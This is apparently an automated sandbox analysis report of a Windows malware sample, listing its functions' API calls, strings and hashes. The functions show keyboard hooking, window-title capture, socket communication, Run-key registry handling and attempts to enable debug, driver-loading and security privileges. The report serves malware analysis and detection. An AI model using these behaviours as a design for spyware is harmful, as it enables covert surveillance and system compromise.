                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandlePointerWrite
                                              • String ID:
                                              • API String ID: 3604237281-0
                                              • Opcode ID: d2ba0dc3731a38dae91c2beef8366eb7a335b2f9f41ba2c363fd86a30408d031
                                              • Instruction ID: 151deff2878064e2e5f4c3019f043201d4d2a7a25dfefc6fc224e88c9f49a64d
                                              • Opcode Fuzzy Hash: d2ba0dc3731a38dae91c2beef8366eb7a335b2f9f41ba2c363fd86a30408d031
                                              • Instruction Fuzzy Hash: 2E01F571208715BFE6244E28AD89FBBB7ECEB46364F11472AF561C23C0D761DD058631
                                              Function 000C9D97 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C9E6F), ref: 000C9DCD
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,000C9E6F), ref: 000C9DDC
                                              • Sleep.KERNEL32(00002710,?,?,?,000C9E6F), ref: 000C9E09
                                              • CloseHandle.KERNEL32(00000000,?,?,?,000C9E6F), ref: 000C9E10
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSizeSleep
                                              • String ID:
                                              • API String ID: 1958988193-0
                                              • Opcode ID: 8723c1c6c97cfb076b0b651e738c7602d06531423bd1b7fe0e91e96f20afb659
                                              • Instruction ID: 4c4bbb8bbfc90db1b10a8cb9913a172b6c976d5cba6162d906bf5fdfcf428acc
                                              • Opcode Fuzzy Hash: 8723c1c6c97cfb076b0b651e738c7602d06531423bd1b7fe0e91e96f20afb659
                                              • Instruction Fuzzy Hash: FC112930344A406FE731E7649D8DFAE7BEAAB62311F04040CF18243A92DAA07CD58365
                                              Function 000D297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,000CBFB2,00000000,001342E0,001342F8,?,pth_unenc), ref: 000D2988
                                              • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 000D2998
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 000D2986
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteOpenValue
                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                              • API String ID: 2654517830-1051519024
                                              • Opcode ID: 3add33ec050d1518aca83dbbc0f5dbf142d777907be5f850d422b6be4548c600
                                              • Instruction ID: 95025eef67f664e7d8c018ddaba477b03baccc88db147f893ec87320051ce6bd
                                              • Opcode Fuzzy Hash: 3add33ec050d1518aca83dbbc0f5dbf142d777907be5f850d422b6be4548c600
                                              • Instruction Fuzzy Hash: 2CE01274200304BBEF144F61DD06FDAB7BCBB55B88F004155F505E5190E271DE44A660
                                              Function 000CAF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 000CAF84
                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 000CAFAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteDirectoryFileRemove
                                              • String ID: pth_unenc
                                              • API String ID: 3325800564-4028850238
                                              • Opcode ID: 6e0819342c79d76f31d1636ea39c3d40121d2699a61f077f9900abf2596afdba
                                              • Instruction ID: 8e0f1812c017a8d6cc1dcffdbd69b4af49a1caf743567c83a69db85483f8a86f
                                              • Opcode Fuzzy Hash: 6e0819342c79d76f31d1636ea39c3d40121d2699a61f077f9900abf2596afdba
                                              • Instruction Fuzzy Hash: DFE04F715406108BC614AB71ED44BEFB7A8AB16315F00441EF8D2D3652DF749989D650
                                              Function 000D2513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 000D2537
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 000D2554
                                              • RegCloseKey.KERNEL32(?), ref: 000D255F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 48a471b0c424dac608a3d4d81d3839b2b14eb7d647f9c05cf9965adbc26c2180
                                              • Instruction ID: 4e1eef86c30664ba3b9cfe9d8f4bb79bb960f612c707402b630e05b67c20aa9e
                                              • Opcode Fuzzy Hash: 48a471b0c424dac608a3d4d81d3839b2b14eb7d647f9c05cf9965adbc26c2180
                                              • Instruction Fuzzy Hash: 85F08176900228BBCB209BA1ED48DEF7FBDEB45750F004065BA06E3240D7709E45DBB0
                                              Function 000D265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,001342F8), ref: 000D2679
                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 000D2692
                                              • RegCloseKey.KERNEL32(00000000), ref: 000D269D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 8dbf6008dc8cf489e4064e5ee091b3744601bbd9cbc38a6e2af194e91b752ff9
                                              • Instruction ID: e980e3915e10c24b4eec858ce392f210e7397d7bc4b72a43c653c3fbe70892bf
                                              • Opcode Fuzzy Hash: 8dbf6008dc8cf489e4064e5ee091b3744601bbd9cbc38a6e2af194e91b752ff9
                                              • Instruction Fuzzy Hash: 9C018135404229FBCF21AFA1DC05DDF7F78EF15350F008055BA0462260D7319AA5EBA0
                                              Function 000D24B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 000D24D7
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,001342F8), ref: 000D24F5
                                              • RegCloseKey.KERNEL32(?), ref: 000D2500
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 648404005d813fc182630d64b3b98aa6b283847afcf59e1a2c5ba15395205509
                                              • Instruction ID: 54ec49fa973c0799dc248204dd676d2a321eb27739b90db2caa9d5db9fa0064f
                                              • Opcode Fuzzy Hash: 648404005d813fc182630d64b3b98aa6b283847afcf59e1a2c5ba15395205509
                                              • Instruction Fuzzy Hash: 61F03A76D00308BFDF119FA0AD05FDE7BB8EB08744F1080A1FA05E6294D6709B54ABA0
                                              Function 000D246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,000CB996,001260E0), ref: 000D2485
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,000CB996,001260E0), ref: 000D2499
                                              • RegCloseKey.KERNEL32(?,?,?,000CB996,001260E0), ref: 000D24A4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 27d80018fe5496778ea6f41b5f9fc9c7b2a15806f56a5c4afc7562ad47d8c5cb
                                              • Instruction ID: e3fff96f3ab752c294a32682cee9fb903fda3b63fa4c4670a348fbbe52ca4b06
                                              • Opcode Fuzzy Hash: 27d80018fe5496778ea6f41b5f9fc9c7b2a15806f56a5c4afc7562ad47d8c5cb
                                              • Instruction Fuzzy Hash: 86E03931805224BA9B314BA29D09EDB7FBCEF2A7A0B108041BC09A2351D2218E80E6F0
                                              Function 000D27D5 Relevance: 4.5, APIs: 3, Instructions: 31registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                              • RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                              • RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID:
                                              • API String ID: 1818849710-0
                                              • Opcode ID: bb2dea9eddf392fd87e2bfe4f0942041e5fbc3b7f78acca0bb9f3115345d1729
                                              • Instruction ID: 73487da1e99e8544afccb17bdf40902ede2a9398fc1c010b34834d38e88d11ee
                                              • Opcode Fuzzy Hash: bb2dea9eddf392fd87e2bfe4f0942041e5fbc3b7f78acca0bb9f3115345d1729
                                              • Instruction Fuzzy Hash: F6E06D71640308BBEF119FA09D06FDE3BB8EB19B94F108051FB05E62D0D6718E54EBA0
                                              Function 000C455B Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C460E,00000000,?,?), ref: 000C456A
                                              • SetEvent.KERNEL32(?,?,?,000C460E,00000000,?,?), ref: 000C4588
                                              • recv.WS2_32(?,?,?,00000000), ref: 000C459F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventObjectSingleWaitrecv
                                              • String ID:
                                              • API String ID: 311754179-0
                                              • Opcode ID: fcc40964b8888e0a0a0b8f57444bfb3bc98ad1526d9a84dc833a9a965538b2d1
                                              • Instruction ID: 9c2a4d4ca44a9c17bbd9130238169ef5be28992da95ee1ae6b1e2c4ac2878bce
                                              • Opcode Fuzzy Hash: fcc40964b8888e0a0a0b8f57444bfb3bc98ad1526d9a84dc833a9a965538b2d1
                                              • Instruction Fuzzy Hash: 96F08236108612BFD7054B14ED08E4AFBA2FB88720F10C61AF510526A0CB71AC61DB51
                                              Function 000DA945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 000DA959
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: @
                                              • API String ID: 1890195054-2766056989
                                              • Opcode ID: a898107862468718857077da2e194838c699c9c502fc5390ec59d5f37e219b9a
                                              • Instruction ID: 5ff19127388966fda8543717f01b0e5648e6ae65a4874f51a6eab627f4a560ba
                                              • Opcode Fuzzy Hash: a898107862468718857077da2e194838c699c9c502fc5390ec59d5f37e219b9a
                                              • Instruction Fuzzy Hash: 69D067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E9458B94
                                              Function 000D4B9B Relevance: 3.2, APIs: 2, Instructions: 163COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountEventTick
                                              • String ID:
                                              • API String ID: 180926312-0
                                              • Opcode ID: c841f2399048fab8e2736912c30da4a65e2a59900bf57d32fe13b7fb51fa3289
                                              • Instruction ID: bb4360bc3d95e3993a9a3af6433594c5e020d5785405bc67f4ac965335e4a5be
                                              • Opcode Fuzzy Hash: c841f2399048fab8e2736912c30da4a65e2a59900bf57d32fe13b7fb51fa3289
                                              • Instruction Fuzzy Hash: FB5152326083505BC324F774D8A2FEF73A5AF92710F50492EF94A97293EF309945C666
                                              Function 000C41F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WS2_32(?,00000001,00000006), ref: 000C4212
                                                • Part of subcall function 000C4262: WSAStartup.WS2_32(00000202,00000000), ref: 000C4277
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 000C4252
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEventStartupsocket
                                              • String ID:
                                              • API String ID: 1953588214-0
                                              • Opcode ID: a0b0742b25db175dde6e4019ddeb607845aea120d62b2a44af2cabe6b2849989
                                              • Instruction ID: 9198e14bf370f1a2d1f4195e519bab30c8ad233473dd3e37bb9c94f726e778e2
                                              • Opcode Fuzzy Hash: a0b0742b25db175dde6e4019ddeb607845aea120d62b2a44af2cabe6b2849989
                                              • Instruction Fuzzy Hash: 68012C71418B909ED7358F38B845BDABFE0AB19314F044A5EF1D687BA1D3B1A485CB10
                                              Function 000F360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000F3DE7
                                                • Part of subcall function 000F7BD7: RaiseException.KERNEL32(?,?,000F4411,?,?,?,?,?,?,?,?,000F4411,?,0012D644,000C4AD0), ref: 000F7C37
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000F3E04
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Exception@8Throw$ExceptionRaise
                                              • String ID:
                                              • API String ID: 3476068407-0
                                              • Opcode ID: 9998742e979d8b88f88c0c93b6451690660d067c3541bb8706e52fbccc25153c
                                              • Instruction ID: b72d4a49fe63f1c845dd118be9c2e6384e5fbe9c9a70ca4727aaaaa28e4d12f6
                                              • Opcode Fuzzy Hash: 9998742e979d8b88f88c0c93b6451690660d067c3541bb8706e52fbccc25153c
                                              • Instruction Fuzzy Hash: 45F0BE3480420D76CB14B6A4F80A9FD376C4F00320B608234FB2896CE2EFB0EB5AA595
                                              Function 000DAC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 000DAC74
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 000DAC87
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$ForegroundText
                                              • String ID:
                                              • API String ID: 29597999-0
                                              • Opcode ID: 11d387af1941c30164277cb951a1a4a555abc00d20de8b740a0db4893a33d5ad
                                              • Instruction ID: 2319b42bb112c9a57a4952e0ec25d5392796c34a29a20692d853b41f787fceed
                                              • Opcode Fuzzy Hash: 11d387af1941c30164277cb951a1a4a555abc00d20de8b740a0db4893a33d5ad
                                              • Instruction Fuzzy Hash: DDE08075A1031867FB24A7649D4EFDB777CA704700F040099B619D21C3EDB09E44CBE4
                                              Function 000D3F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00131B28,00134358,00000000,000D4240,00000000,00000001), ref: 000D3FBC
                                              • WSASetLastError.WS2_32(00000000), ref: 000D3FC1
                                                • Part of subcall function 000D3E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 000D3E86
                                                • Part of subcall function 000D3E37: LoadLibraryA.KERNEL32(?), ref: 000D3EC8
                                                • Part of subcall function 000D3E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3EE8
                                                • Part of subcall function 000D3E37: FreeLibrary.KERNEL32(00000000), ref: 000D3EEF
                                                • Part of subcall function 000D3E37: LoadLibraryA.KERNEL32(?), ref: 000D3F27
                                                • Part of subcall function 000D3E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3F39
                                                • Part of subcall function 000D3E37: FreeLibrary.KERNEL32(00000000), ref: 000D3F40
                                                • Part of subcall function 000D3E37: GetProcAddress.KERNEL32(00000000,?), ref: 000D3F4F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                              • String ID:
                                              • API String ID: 1170566393-0
                                              • Opcode ID: 45d8ce274a002368046cafba1323d57b980795dc39b5917f8bbdb14d48d70ae3
                                              • Instruction ID: a281dc48c8fafb0a35918d0a4bab0343470afb7096225bcf3350d4399533eff9
                                              • Opcode Fuzzy Hash: 45d8ce274a002368046cafba1323d57b980795dc39b5917f8bbdb14d48d70ae3
                                              • Instruction Fuzzy Hash: D7D05E326406316FE354676DAC00EFAFAEDDFA6B71B150027F400D3A94D6904D82C3B6
                                              Function 000CBED7 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,000CD9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0012556C,00000003,00000000), ref: 000CBEE6
                                              • GetLastError.KERNEL32 ref: 000CBEF1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateErrorLastMutex
                                              • String ID:
                                              • API String ID: 1925916568-0
                                              • Opcode ID: d72f064f27f35d10ec98e051c69c544c426cdf52a1488e791d3bdd38d362414b
                                              • Instruction ID: c56c8e856ee810c1a6829b731f23a55691664a6ecad6794fd0439ba74f3ee99a
                                              • Opcode Fuzzy Hash: d72f064f27f35d10ec98e051c69c544c426cdf52a1488e791d3bdd38d362414b
                                              • Instruction Fuzzy Hash: 29D012706082009BE70C1774AD4EBBD3566E784702F004169B507D6AD1CB7448809511
                                              Function 000C9517 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID:
                                              • API String ID: 176396367-0
                                              • Opcode ID: fa5574a3a8dce29d88be0a2111690bedae46a3abdb664f0c1eff659bef5053b7
                                              • Instruction ID: a464d039db74e2773a6e26e047f59d2a513beb855f553a473482cc4dd6bb70bd
                                              • Opcode Fuzzy Hash: fa5574a3a8dce29d88be0a2111690bedae46a3abdb664f0c1eff659bef5053b7
                                              • Instruction Fuzzy Hash: 48116A31900645AFDB15EF64D852EEF7BB4AF25310B10442DF85293293EF74B959CB50
                                              Function 000C9A97 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              • CallNextHookEx.USER32(001340F8,?,?,?), ref: 000C9B02
                                                • Part of subcall function 000CAD56: GetKeyState.USER32(00000011), ref: 000CAD5B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CallHookNextState
                                              • String ID:
                                              • API String ID: 3280314413-0
                                              • Opcode ID: 86cb908a87392341c77a1a6602f3adb8a7b03cdefe7fd97f9fbe4ae461f81dce
                                              • Instruction ID: fb967cb3fde32e9876122375b4429e2d9e5f4d68eb3f0082a0683791982818b9
                                              • Opcode Fuzzy Hash: 86cb908a87392341c77a1a6602f3adb8a7b03cdefe7fd97f9fbe4ae461f81dce
                                              • Instruction Fuzzy Hash: 76F0F9723042895BCA14AFFC9CD8FAE77A5EB86319F00442DB40346953CAA58804D393
                                              Function 00106AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 12de76ff6dc6c327dd46f669e88c411953607cbdf5b735c00c6ff022e5790696
                                              • Instruction ID: 496dea62c29c3646f942beece522b7b60401eff5b47dae264ce7fe25ba3c3f99
                                              • Opcode Fuzzy Hash: 12de76ff6dc6c327dd46f669e88c411953607cbdf5b735c00c6ff022e5790696
                                              • Instruction Fuzzy Hash: 5AE022B130023A67EB202B69CC01F9B3A899F523A0F154120FCC9DA4D0CFE0CC6081E0
                                              Function 000C4262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WS2_32(00000202,00000000), ref: 000C4277
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: 0e611b1d4976edb942d41382d5b49ac8da47f591ef4286791289a5ce4c913500
                                              • Instruction ID: 5dff2fb448ec8eb99c8df0af4c98d57e93a691fe6700e0b0d37d4382a7ae4919
                                              • Opcode Fuzzy Hash: 0e611b1d4976edb942d41382d5b49ac8da47f591ef4286791289a5ce4c913500
                                              • Instruction Fuzzy Hash: 0FD012329596489ED610AAB4AD0F8E47B6CD317612F0003AA6CB583ED2E640261CC2A7

                                              Non-executed Functions

                                              Function 004090DF Relevance: 47.4, APIs: 17, Strings: 10, Instructions: 164COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00409103
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040910A
                                              Strings
                                              • SeProfileSingleProcessPrivilege, xrefs: 00409204
                                              • Could not enable SeSystemEnvironmentPrivilege, xrefs: 0040928C
                                              • Could not enable SeDebugPrivilege, xrefs: 0040915E
                                              • SeLoadDriverPrivilege, xrefs: 00409179
                                              • Could not enable SeLoadDriverPrivilege, xrefs: 004091B2
                                              • SeDebugPrivilege, xrefs: 0040911F
                                              • Could not enable SeProfileSingleProcessPrivilege, xrefs: 00409241
                                              • SeSystemEnvironmentPrivilege, xrefs: 0040924F
                                              • SeSecurityPrivilege, xrefs: 004091BD
                                              • Could not enable SeSecurityPrivilege, xrefs: 004091F6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Process$CurrentOpenToken
                                              • String ID: Could not enable SeDebugPrivilege$Could not enable SeLoadDriverPrivilege$Could not enable SeProfileSingleProcessPrivilege$Could not enable SeSecurityPrivilege$Could not enable SeSystemEnvironmentPrivilege$SeDebugPrivilege$SeLoadDriverPrivilege$SeProfileSingleProcessPrivilege$SeSecurityPrivilege$SeSystemEnvironmentPrivilege
                                              • API String ID: 2256020841-272810714
                                              • Opcode ID: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction ID: b8165345c32a87174b9950b5c2d351cd3d9e982d028e98a03367593e3ed6d555
                                              • Opcode Fuzzy Hash: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction Fuzzy Hash: 89516F70A4024ABEEB10DFA18D84EBF7BACEB04744F14443AB901F9192D778CE419A79
                                              Function 004087AE Relevance: 44.2, APIs: 14, Strings: 11, Instructions: 467encryptiontimememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _strlen.LIBCMT ref: 00408885
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000104), ref: 00408892
                                              • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 004088CD
                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 004088F8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408910
